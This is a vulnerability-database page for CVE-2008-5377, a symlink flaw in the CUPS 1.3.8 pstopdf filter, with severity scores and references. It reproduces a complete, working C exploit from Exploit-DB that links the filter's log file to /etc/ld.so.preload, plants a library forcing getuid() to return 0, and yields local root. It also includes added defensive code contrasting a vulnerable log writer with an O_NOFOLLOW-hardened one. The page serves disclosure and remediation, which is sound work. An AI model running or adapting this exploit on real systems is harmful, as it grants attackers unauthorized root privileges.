CVE-2008-5377 : Detail
A01-Broken Access Control
0.19%V4
Local
2008-12-08
22h00 +00:00
2017-09-28
10h57 +00:00

CVE Descriptions

pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/pstopdf.log temporary file, a different vulnerability than CVE-2001-1333.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-59 Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

Metrics

Metrics  Score  Severity  CVSS Vector                  Source
V2       6.9    Medium    AV:L/AC:M/Au:N/C:C/I:C/A:C   nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is thus the way to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 7550

Publication date : 2008-12-21 23h00 +00:00
Author : Jon Oberheide
EDB Verified : Yes

```c
/*
 * cve-2008-5377.c
 *
 * CUPS < 1.3.8-4 pstopdf filter exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Usage:
 *
 * $ gcc cve-2008-5377.c -o cve-2008-5377
 * $ ./cve-2008-5377
 * $ id
 * uid=0(root) gid=1000(vm) ...
 *
 * Information:
 *
 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
 *
 * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
 * a symlink attack on the /tmp/pstopdf.log temporary file.
 *
 * Operation:
 *
 * The exploit creates and prints a malformed postscript document that will
 * cause the CUPS pstopdf filter to write an error message out to its log
 * file that contains the string /tmp/getuid.so. However, since we also
 * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
 * error message and malicious shared library path will be appended to the
 * ld.so.preload file, allowing us to elevate privileges to root.
 *
 * Note:
 *
 * This exploit only works under the (rare) conditions that cupsd executes
 * external filters as a privileged user and that a printer on the system
 * uses the pstopdf filter (e.g. the pdf.ppd PDF converter). Also,
 * /etc/ld.so.preload must be world readable.
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

int main(void)
{
    int ret;
    FILE *fp;
    struct stat log;

    /* Malformed PostScript: the filter echoes the offending token, and with
       it our library path, into its error log. */
    fp = fopen("/tmp/cve-2008-5377.ps", "w");
    if (!fp) {
        printf("error: cannot open /tmp/cve-2008-5377.ps\n");
        goto cleanup;
    }
    fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
    fclose(fp);

    /* Shared library that ld.so will preload into every dynamically linked
       process once its path lands in /etc/ld.so.preload. */
    fp = fopen("/tmp/getuid.c", "w");
    if (!fp) {
        printf("error: cannot open /tmp/getuid.c\n");
        goto cleanup;
    }
    fprintf(fp, "int getuid(){return 0;}\n");
    fclose(fp);

    ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
    if (WEXITSTATUS(ret) != 0) {
        printf("error: cannot compile /tmp/getuid.c\n");
        goto cleanup;
    }

    /* Plant the symlink at the predictable log path before the filter runs. */
    unlink("/tmp/pstopdf.log");
    ret = stat("/tmp/pstopdf.log", &log);
    if (ret != -1) {
        printf("error: /tmp/pstopdf.log already exists\n");
        goto cleanup;
    }
    ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
    if (ret == -1) {
        printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
        goto cleanup;
    }

    /* Submit the job; the pstopdf filter follows the symlink when it logs. */
    ret = system("lp < /tmp/cve-2008-5377.ps");
    if (WEXITSTATUS(ret) != 0) {
        printf("error: could not print /tmp/cve-2008-5377.ps\n");
        goto cleanup;
    }

cleanup:
    /* The symlink and /tmp/getuid.so are left in place on purpose. */
    unlink("/tmp/cve-2008-5377.ps");
    unlink("/tmp/getuid.c");
    return 0;
}

// milw0rm.com [2008-12-22]
```
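The exploit above works because the filter appends to a fixed path in a world-writable directory and the C library call it uses follows whatever symlink a local user has planted there. The following is an added example, not code from the CVE entry, the exploit author or CUPS: a minimal log writer with the same CWE-59 defect beside a hardened variant, and a reproduction of the symlink attack in a private scratch directory under /tmp. All file names, function names and the logged message are assumptions for illustration; the mitigation shown (O_NOFOLLOW, a 0600 creation mode and an fstat() check on the opened descriptor) is the generic fix for this pattern, not a description of the actual CUPS patch.

```c
/* Added example, not the page's or CUPS's own code. Paths, names and the
 * message string are assumptions for illustration. Linux/POSIX only. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Vulnerable pattern (CWE-59): append to a fixed path in a shared directory.
 * fopen() follows symlinks, so with log_path -> /etc/ld.so.preload planted by
 * a local user the message is appended to the target instead. */
int log_error_vuln(const char *log_path, const char *msg)
{
    FILE *fp = fopen(log_path, "a");
    if (!fp)
        return -1;
    fprintf(fp, "%s\n", msg);
    fclose(fp);
    return 0;
}

/* Hardened pattern: O_NOFOLLOW makes open() fail with ELOOP if the final
 * component is a symlink; mode 0600 keeps others out of a new file; fstat()
 * on the descriptor rejects anything that is not a regular, unshared file
 * owned by the caller (planted hard link, device node, foreign file). */
int log_error_safe(const char *log_path, const char *msg)
{
    struct stat st;
    size_t len = strlen(msg);
    int fd = open(log_path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;                       /* errno == ELOOP: symlink planted */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    if (write(fd, msg, len) != (ssize_t)len || write(fd, "\n", 1) != 1) {
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

static long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Reproduce the attack in a scratch directory: "target" stands in for
 * /etc/ld.so.preload, "pstopdf.log" for the predictable log path. Returns 1
 * if the message landed in target (attack worked), 0 if the writer refused
 * and target is still empty, -1 on a setup failure. */
int demo_symlink_attack(int use_safe_writer)
{
    char dir[] = "/tmp/cwe59-demo-XXXXXX";
    char target[64], link[64];
    int tfd, rc, result = -1;
    long size;

    if (!mkdtemp(dir))
        return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/pstopdf.log", dir);
    tfd = open(target, O_WRONLY | O_CREAT, 0600);   /* empty victim file */
    if (tfd < 0 || close(tfd) < 0 || symlink(target, link) < 0)
        goto cleanup;
    rc = use_safe_writer ? log_error_safe(link, "/tmp/getuid.so")
                         : log_error_vuln(link, "/tmp/getuid.so");
    size = file_size(target);
    if (rc == 0 && size > 0)
        result = 1;
    else if (rc < 0 && size == 0)
        result = 0;
cleanup:
    unlink(link);
    unlink(target);
    rmdir(dir);
    return result;
}

/* The hardened writer must still work on an ordinary, not-yet-existing path.
 * Returns the resulting file size in bytes, or -1. */
long demo_regular_file(void)
{
    char dir[] = "/tmp/cwe59-demo-XXXXXX";
    char path[64];
    long size = -1;

    if (!mkdtemp(dir))
        return -1;
    snprintf(path, sizeof path, "%s/pstopdf.log", dir);
    if (log_error_safe(path, "/tmp/getuid.so") == 0)
        size = file_size(path);
    unlink(path);
    rmdir(dir);
    return size;
}

int main(void)
{
    printf("fopen(\"a\") on planted symlink: %s\n",
           demo_symlink_attack(0) == 1 ? "target overwritten" : "no effect");
    printf("O_NOFOLLOW writer on planted symlink: %s\n",
           demo_symlink_attack(1) == 0 ? "refused, target untouched" : "unexpected");
    printf("O_NOFOLLOW writer on a fresh path: %ld bytes written\n", demo_regular_file());
    return 0;
}
```

The fstat() step matters as much as O_NOFOLLOW: a symlink is only one way to redirect a fixed path, and a hard link or a file pre-created by another user passes the open() but fails the owner and link-count checks. The more thorough fix, which the example does not show, is to stop using a predictable name in a shared directory at all and log under a private, non-world-writable directory or via mkstemp().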

Products Mentioned

Configuration 0

Apple>>Cups >> Version 1.3.8

References

http://uvw.ru/report.sid.txt
Tags : x_refsource_MISC
https://www.exploit-db.com/exploits/7550
Tags : exploit, x_refsource_EXPLOIT-DB